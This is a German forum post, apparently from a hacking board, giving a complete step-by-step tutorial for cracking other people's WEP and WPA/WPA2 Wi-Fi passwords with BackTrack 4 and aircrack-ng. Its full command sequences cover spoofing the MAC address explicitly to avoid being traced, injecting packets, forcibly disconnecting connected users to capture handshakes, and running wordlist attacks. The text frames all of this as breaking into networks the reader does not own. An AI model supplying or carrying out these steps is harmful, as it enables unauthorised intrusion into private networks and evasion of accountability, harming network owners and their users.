Ich Lese in der Wireless section immer noch oft fragen wie: Wie hacke (ich kann das wort nicht austehen) ich ein wlan netz:
Um diesen Fragen Vorzubeugen schreibe ich jetzt ein Tutorial für die Dumpfbacken
1.) Laden
Man läd sich Backtrack 4 herrunter (http://www.backtrack-linux.org/)
Jenachdem Was ihr knacken wollt entweder die LiveCD oder die Version für den USB-Stick. (Darauf komme ich Später)
2.) Brennen/Installieren
Brennt den kram auf eine DVD oder – bei der USB version – installiert sie euch auf einem min. 4 GB Stick. Das sollte wirklich jeder ohne genaue anleitung können. Wenn das nicht der Fall sein sollte geht lieber wieder Sandburgen bauen.
3.) Backtrack Starten
Als allererstes bevor ihr BT startet schaltet ihr euer Note-Netbook / PC aus macht ihn an und geht mit F2 oder F12 (können auch anderre F* tasten sein je nach BIOS unterschiedlich) in das Bootmenu.
Dort stellt ihr euer CD Laufwerk oder eure USB anschlüsse an 1. stelle.
Bestätigen und nun Sollte euer PC als erstes nach Bootdateien auf dem USB-Stick oder der CD suchen.
Jetzt Startet Backtrack.
Nachdem der bootvorgang fertig ist müsst ihr
startx
eingeben um auf die Grafische oberfläche von backtrack zu kommen.
4.)Solangsam gehts Los! (WEP/WPA/2)
Öffnet eine Shell. Diese findet ihr unten Links in der „Startleiste“
(kleines Schwarzes kästchen)
Dort tippt ihr folgendes ein um herrauszufinden welcher euer Wlan Adapter ist.
airmon-ng
Falls eure Interne W-lan karte nicht erkannt wird solltet ihr euch am Besten einen Kompatieblen USB-Wlan Adapter kaufen. Eine genaue liste findet ihr wenn ihr googelt.
5.) Mac ändern
So Nachdem ihr nun wisst wie euer Wlan Adapter heißt
(bei mir ist es wlan0)
Solltet ihr eure MAC-Adresse ändern damit man euch nicht zurückverfolgen kann.
das geht so:
airmon-ng stop (euer interface bei mir wlan0) ifconfig (euer interface bei mir wlan0) down macchanger --mac (beliebige mac) (euer interface bei mir wlan0) airmon-ng start (euer interface bei mir wlan0)
Also wenn euer Interface wlan0 heißt (ich werde wlan0 – immer – jetzt als Bsp. nehmen)
Sollte das ganze so aussehen:
airmon-ng stop wlan0 ifconfig wlan0 down macchanger --mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0
6.) Jetzt gehts weiter für die die WEP knacken wollen WPA kommt gleich.
Nun tippt ihr in die gleiche shell
airodump-ng wlan0
Nun wird nach netzwerken gesucht.
Ganz links seht ihr die BSSID sozusagen die MAC-Adresse vom router
Rechts daneben PWR also Power die empfangsstärke.
Dann kommen Beacons (für uns unwichtig)
daneben befindet sich #Data (wird für ins später wichtig)
dann kommt warscheinlich CH das ist der Channel aufdem der router sendet
danach seht ihr die verschlüsselung des wlan netzes (in unserrem fall sollte es ersteinmal WEP sein)
Ganz rechts ist die ESSID der Name des Routers
Wenn das gewünsche/gesuchte Netzwerk gefunden ist drücken wir Ctrl+C um die suche anzuhalten.
Wir Kopieren uns nun die BSSID herraus.
6.) Lets Go!
Nun tippen wir
airodump-ng -c (Channel stand unter CH) -w (Filename beliebiger name zb wep) --bssid (kopierte bssid) wlan0
Jetzt werden alle empfangenen Packete in die datei wep geschrieben.
Wir öffnen eine neue Shell und lassen die alte auf.
Wir tippen in die neue Shell:
aireplay-ng -1 0 -a (Kopierte bssid) -h (Fakes MAC) -e (ESSID also der netzwerkname) wlan0
Jetzt haben wir uns beim Router „angemeldet“ wir sehen uns jetzt auf bei unserer ersten shell unten als verbunden.
Jetzt kommt #Data ins spiel. Data sind unserre verschlüsselten Packete. Wir könnten jetzt ewig warten bis diese zahl in Shell1 auf über 18.000 ist oder wir beschleunigen das ganze mit:
aireplay-ng -3 -b (bssid) -h (faked mac) wlan0
Jetzt müssen wir warten bis data über 18.000 ist das dauert ca. 2-3 min.
7.)Hack it!
Wir haben jetzt genügent packete gesammelt also können wir beide Shells schließen und eine neue aufmachen.
in diese tippt ihr ein:
aircrack-ng -n 128 -b (bssid) (filename)-01.cap
Als Bsp.
aircrack-ng -n 128 -b 00:12:32:44:D4:3F wep-01.cap
Jetzt sollte das programm Aircrack eure daten entschlüsseln und das passwort unter dem code:
Key found: (pa:ss:wo:rt)
Ausspucken.
Das passwort ist ohne doppelpunkte zu lesen.
Sollte ein Fehler auftreten könnte es sein das die verschlüsselung nur 64 bit beträngt dann in die konsole eingeben:
aircrack-ng -n 64 -b (bssid) (filename)-01.cap
8.) Das Ganze nun auch mit WPA/2
Das ganze funktioniert NUR wenn ein CLIENT mit dem router VERBUNDEN ist!!
Bis:
Wir Kopieren uns nun die BSSID herraus.
ist alles gleich, nur sollte unser gesuchtes netz jetzt WPA oder WPA2 verschlüsselt sein.
9.) Let`s Go!
Nachdem wir unsere BSSID nun kopiert haben suchen wir uns wie oben beschrieben auch den Channel herraus.
Mit:
airodump-ng -c (channel) -w (filename) --bssid (bssid) wlan0
Schreiben wir wieder unserre gesammelten daten in eine file..
Also Bsp:
airodump-ng -c 11 -w wpa --bssid 00:12:F3:4D:12:1A wlan0
Mit diesem befehl schreiben wir also, von unserrem wlan netz XY mit der BSSID 00:12:F3:4D:12:1A
das auf channel 11 sendet, alle empfangenen daten in das file wpa-01.cap
Anders als bei WEP kann hier anhand der gesendeten #Data nicht das passwort entschlüsselt werden.
Hierzu benötigen wir einen Handshake.
10.) Der Handshake
Ein Handshake kann man wirklich frei mit Handschlag übersetzen. Unser Client (Jemd. der mit dem Router Verbunden ist)
sendet bei einer neuanmeldung das passwort in verschlüsselter weise.
Wir könnten nun minuten oder stunden warten bis sich unser client neu verbindet. Müssen wir aber nicht.
Wir haben ja unserre Shell in der wir sehen wie das netzwerk heißt und wer verbunden ist das geschah mit dem letzten befehl.
Unten sehen wir wer verbunden ist. Wenn wir einen Handshake bekommen sehen wir das daran das ganz oben Rechts in unserrer shell Handshake! steht.
Wir öffnen nun eine neue Shell um den Clienten rauszuwerfen damit er sich neu verbinden und tippen:
aireplay-ng -0 5 -a (bssid) wlan0
Wobei 5 die anzahl ist wie oft wir das ganze versuchen möchten.
Bei dieser Methode würde unser Client nichts mitkriegen.
Nun muss es nicht zwingend notwendig sein das das ganze funktioniert da neuere router dies nicht mehr zulassen.
Wie bringen wir jetzt den Clienten zum disconnecten? Ganz einfach wir sagen dem Router: „Hallo ich bin der Nutzer und würde mich gerne Ausloggen!“
Das könnte allerdings unser Client mitkriegen jedoch wer denkt sich schon was dabei
wenn die internetverbindung flöten geht?
Also werfen wir unserren Clienten raus:
aireplay-ng -0 1 -a (bssid) -c (Client Mac) wlan0
Die Clienten Mac addresse sehen wir in Shell1 unten.
Jetzt Sollten wir einen handshake haben.
11.)Crack it!
Wir haben einen handshake und können also getrost alle unserre Shells schließen und eine neue frische aufmachen.
in diese tippen wir nun folgendes:
aircrack-ng (filename)-01.cap
Wir werden nun sehen das in der datei ein Handshake vorhanden ist.
Jetzt Brauchen wir eine Word- Combolist hier verweise ich mal auf unserre Word und Combolisten Section im board.
Wir Browsen nun zur Wordlist die sich zB hier befindet
[code][/code]/home/wordlist[code][/code]
in meinem Bsp heist meine Wordlist Words.txt
nun geben wir in die Shell folgendes ein:
aircrack-ng (filename)-01.cap -w (Pfad zu unserer Wordlist)
In meinem Bsp sollte das dan so ausehen:
aircrack-ng wpa-01.cap -w /home/wordlist/Words.txt
So und nun testet das Programm aircrack alle wörter in der liste ob diese zu dem verschlüsselten handshake passen.
Wenn das passwort gefunden ist wird es angezeigt.
Zur info mein Samsung Netbook mit 1,6 Atom Testet 900 keys die sek
Mein Thinkpad SL510 Notebook mit 2,6 dual testet 1600 keys die sek.
Sollte das entsprechende Passwort nicht in der liste sein haben wir also Pech!
Credits: Armageddon